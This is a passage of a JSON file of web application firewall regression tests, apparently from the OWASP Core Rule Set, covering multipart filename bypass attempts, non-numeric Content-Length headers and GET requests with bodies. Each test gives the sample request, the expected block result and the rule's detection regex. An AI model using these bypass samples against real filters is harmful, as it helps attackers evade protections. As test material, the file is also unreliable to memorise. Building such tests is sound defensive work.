name=\"áéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": false, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"áéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeiou]grave;.", "test_id": 24, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"zzzàèìòùÀÈÌÒÙzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": false, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"zzzàèìòùÀÈÌÒÙzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[aeiou]grave;", "test_id": 25, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"àèìòùÀÈÌÒÙzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": false, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"àèìòùÀÈÌÒÙzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[cgklnrst]cedil;.", "test_id": 26, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"zzzç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": false, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"zzzç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[cgklnrst]cedil;", "test_id": 27, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"ç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": false, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"ç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[anoi]tilde;.", "test_id": 28, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"zzzãñõĩÃÑÕĨzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": false, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"zzzãñõĩÃÑÕĨzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[anoi]tilde;", "test_id": 29, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"ãñõĩÃÑÕĨzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": false, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"ãñõĩÃÑÕĨzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[cdelnrstz]caron;.", "test_id": 30, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"zzzčďěľňřšťžČĎĚĽŇŘŠŤŽzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": false, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"zzzčďěľňřšťžČĎĚĽŇŘŠŤŽzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[cdelnrstz]caron;", "test_id": 31, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"čďěľňřšťžČĎĚĽŇŘŠŤŽzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": false, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"čďěľňřšťžČĎĚĽŇŘŠŤŽzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[au]ring;.", "test_id": 32, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"zzzåůÅŮzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": false, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"zzzåůÅŮzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[au]ring;", "test_id": 33, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"åůÅŮzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": false, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"åůÅŮzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: ø,&, ,'.", "test_id": 34, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"zzzøØ&& 'zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": false, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"zzzøØ&& 'zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[au]ring;", "test_id": 35, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"øØ&& 'zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": false, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"øØ&& 'zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Still match ; that aren't part of an HTML entity in FILES.", "test_id": 36, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"&fi;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": true, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"&fi;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Still match ; that aren't part of an HTML entity in FILES_NAMES.", "test_id": 37, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"test\"; filename=\"&fi;zzz\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": true, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"test\"; filename=\"&fi;zzz\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Don't match ; that are part of HTML entities in both FILES and FILES_NAMES.", "test_id": 38, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"zzz&zzz\"; filename=\"zzz&zzz\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": false, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"zzz&zzz\"; filename=\"zzz&zzz\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Allow empty fields.", "test_id": 39, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"\"; filename=\"\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": false, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"\"; filename=\"\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Match \\ in FILES.", "test_id": 40, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"test\"; filename=\"1.j\\s\\p\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": true, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"test\"; filename=\"1.j\\s\\p\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920121). Match \\ in FILES_NAMES.", "test_id": 41, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"cv.p\\d\\f\"; filename=\"cv.pdf\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": true, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"cv.p\\d\\f\"; filename=\"cv.pdf\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 109, "variables": [ { "variable": "FILES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "FILES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)^(?:&(?:(?:[acegilnorsuz]acut|[aeiou]grav|[aino]tild)e|[c-elnr-tz]caron|(?:[cgklnr-t]cedi|[aeiouy]um)l|[aceg-josuwy]circ|[au]ring|a(?:mp|pos)|nbsp|oslash);|[^\\\"';=\\x5c])*$", "actions": [ { "act_name": "id", "lineno": 110, "act_quote": "no_quote", "act_arg": "920120", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 111, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 112, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 113, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 113, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 114, "act_quote": "quotes", "act_arg": "Attempted multipart/form-data bypass", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 115, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 116, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 117, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 118, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 119, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 120, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 121, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 122, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 123, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 124, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 125, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 126, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": true, "oplineno": 109 } }, { "rule_id": "920160", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Content-Length", "negated": false } ], "operator": { "type": "@rx", "argument": "^\\d+$", "negated": true } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "Content-Length HTTP header is not numeric", "logdata": "%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "Non digit Content-Length without content-type", "test_id": 1, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Length": "NotDigits", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [] }, { "description": "Non digit content-length with content-type", "test_id": 2, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "NotDigits", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [] }, { "description": "Mixed digit and non digit content length", "test_id": 3, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "123x", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [] }, { "description": "Content-Length HTTP header is not numeric (920160) from old modsec regressions\nTest is based in httpbin.org, so backend returns 405 if you are not posting to /post\nApache auto corrects for this error now so the log should not contain anything\n", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language": "en-us,en;q=0.5", "Content-Length": "3", "Content-Type": "application/x-www-form-urlencoded", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "abc" }, "expected": { "should_block": false, "rule_ids": [ 920160 ] }, "malicious_patterns": [ { "location": "post_body", "value": "abc" } ] }, { "description": "Content-Length HTTP header is not numeric (920160) from old modsec regressions", "test_id": 5, "request": { "method": "POST", "uri": "/", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language": "en-us,en;q=0.5", "Content-Length": "3;", "Content-Type": "application/x-www-form-urlencoded", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "abc" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [ { "location": "post_body", "value": "abc" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 139, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Content-Length", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^\\d+$", "actions": [ { "act_name": "id", "lineno": 140, "act_quote": "no_quote", "act_arg": "920160", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 141, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 142, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 143, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 144, "act_quote": "quotes", "act_arg": "Content-Length HTTP header is not numeric", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 145, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 146, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 147, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 148, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 149, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 150, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 151, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 152, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 153, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 154, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 155, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 156, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": true, "oplineno": 139 } }, { "rule_id": "920170", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_METHOD", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "^(?:GET|HEAD)$", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "GET or HEAD Request with Body Content", "logdata": "%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "POST Request with data (valid)", "test_id": 1, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "hi=test" }, "expected": { "should_block": false, "rule_ids": [ 920170 ] }, "malicious_patterns": [ { "location": "post_body", "value": "hi=test" } ] }, { "description": "GET request with data", "test_id": 2, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "hi=test" }, "expected": { "should_block": true, "rule_ids": [ 920170 ] }, "malicious_patterns": [ { "location": "post_body", "value": "hi=test" } ] }, { "description": "Head Request with data", "test_id": 3, "request": { "method": "HEAD", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "hi=test" }, "expected": { "should_block": true, "rule_ids": [ 920170 ] }, "malicious_patterns": [ { "location": "post_body", "value": "hi=test" } ] }, { "description": "GET Request but content length is 0 and data is provided.\nWeird HTTP 1.0 support bug in Apache, without newline causes 408\n", "test_id": 4, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "0", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "hi=test\r\n" }, "expected": { "should_block": false, "rule_ids": [ 920170 ] }, "malicious_patterns": [ { "location": "post_body", "value": "hi=test\r\n" } ] }, { "description": "GET request with content length 0 and no data.", "test_id": 5, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", 